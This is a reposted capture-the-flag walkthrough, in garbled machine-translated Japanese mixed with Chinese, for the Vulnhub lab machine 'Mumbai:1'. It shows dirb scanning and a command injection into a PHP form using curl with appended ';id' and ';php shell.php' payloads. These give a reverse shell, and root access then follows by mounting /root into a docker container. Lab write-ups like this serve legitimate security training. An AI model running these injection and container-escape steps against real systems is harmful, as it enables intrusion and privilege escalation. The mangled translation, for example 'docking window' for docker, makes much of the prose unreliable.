ムンバイ:1 Vulnhubチュートリアル

ドローン住所:

https://www.vulnhub.com/entry/mumbai-1,372/

ホストの検出:

 

ホストのポートスキャン:

 

FTPファイルのダウンロード(注)

ALL:

ドッカーに実行されているこれらの複数のHTTPサーバを移動します。私は、コンテナが物事を本質的に作る聞く
セキュアな-多分これは、これらのセキュリティ研究者を黙らます。

また、から/ tmpのすべてのそれらの権限昇格のエクスプロイトを削除することを忘れないでください-私たちはしたくない
もう一度、サーバーを再構築します。

- AbsoZed

HTTPは、ドッキングウィンドウコンテナを実行するために使用されているので、それは、右を言及するドッキングウィンドウを使用することができます意味

HTTPディレクトリのスキャン

 

http://10.10.203.18/drupal/

列のディレクトリは空であります

http://10.10.203.18/wordpress/アクセスできない

HTTP 8000ポートの列挙には

DIRB http://10.10.203.18:8000 -Xの.php、.TXT、.json、.xmlファイル、の.py、.yml

 

+ http://10.10.203.18:8000/keywords.py(CODE:200 | SIZE:1376)
+ http://10.10.203.18:8000/test.php(CODE:200 | SIZE:64)

二つのファイルのダウンロードの内容を見ます

test.phpをファイルの内容

適切なクエリを投稿してください。例:https://caffeinatedengineers.com

keywords.py py脚本就是发送请求给URL

尝试请求下几个有用的URL

 

|--GO SOCIETY--|~~( ﹁ ﹁ ) ~~~Σ>curl -d "query=http://10.10.203.18/wordpress/" http://10.10.203.18:8000/test.php
Site Keywords and Counts:
[('the', 3), ('our', 3), ('to', 3), ('for', 2), ('issues', 2), ('up', 2), ('really', 2), ('you', 2), ('in', 2), ('hey', 1)]

root at Hack404 in ~
|--GO SOCIETY--|~~( ﹁ ﹁ ) ~~~Σ>curl -d "query=http://10.10.203.18/wordpress/;id" http://10.10.203.18:8000/test.php
Site Keywords and Counts:
[('the', 3), ('our', 3), ('to', 3), ('for', 2), ('issues', 2), ('up', 2), ('really', 2), ('you', 2), ('in', 2), ('hey', 1)]
uid=1001(apiuser) gid=1001(apiuser) groups=1001(apiuser),115(docker)

 

本地监听1234

执行:curl -d "query=http://10.10.203.18/wordpress/;php shell.php" http://10.10.203.18:8000/test.php

 

获取shell,尝试提权操作

docker run -v /root:/mnt -it alpine

# cd /root/
cd /root/
~ # cd /mnt
cd /mnt
/mnt # ls
ls
proof.txt
/mnt # cat proof.txt

 

OVER !!

おすすめ

転載: www.cnblogs.com/hack404/p/12124777.html